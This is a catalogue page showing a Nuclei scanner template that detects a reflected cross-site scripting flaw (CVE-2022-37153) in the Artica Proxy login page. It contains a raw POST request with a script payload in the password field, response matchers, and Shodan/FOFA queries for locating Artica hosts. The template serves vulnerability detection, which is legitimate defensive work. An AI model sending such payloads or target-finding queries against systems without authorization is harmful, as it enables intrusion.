Skip to content
Nuclei Templates

Artica Proxy 4.30.000000 - Cross-Site Scripting

ID: CVE-2022-37153

Severity: medium

Author: arafatansari

Tags: cve,cve2022,xss,artica,articatech

Description

Section titled “Description”

Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-37153


info:
  name: Artica Proxy 4.30.000000 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.
  remediation: |
    Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability.
  reference:
    - https://github.com/Fjowel/CVE-2022-37153
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37153
    - https://github.com/SYRTI/POC_to_review
    - https://github.com/WhooAmii/POC_to_review
    - https://github.com/k0mi-tg/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-37153
    cwe-id: CWE-79
    epss-score: 0.0013
    epss-percentile: 0.47096
    cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: articatech
    product: artica_proxy
    shodan-query:
      - http.html:"Artica"
      - http.html:"artica"
    fofa-query: body="artica"
  tags: cve,cve2022,xss,artica,articatech


http:
  - raw:
      - |
        POST /fw.login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Password" value="admin"><script>alert(document.domain)</script>'
          - 'Artica Web'
        condition: and


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a0047304502203f8b189b8f88a16fb33eda84cbab3564b19ef7bb4c4cf3e007088fc4491cc74a022100bdad38ed84fb4e628125e4696610779d16037a62d3eb1b2f8b355ce22f9f2a57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-37153.yaml"

View on Github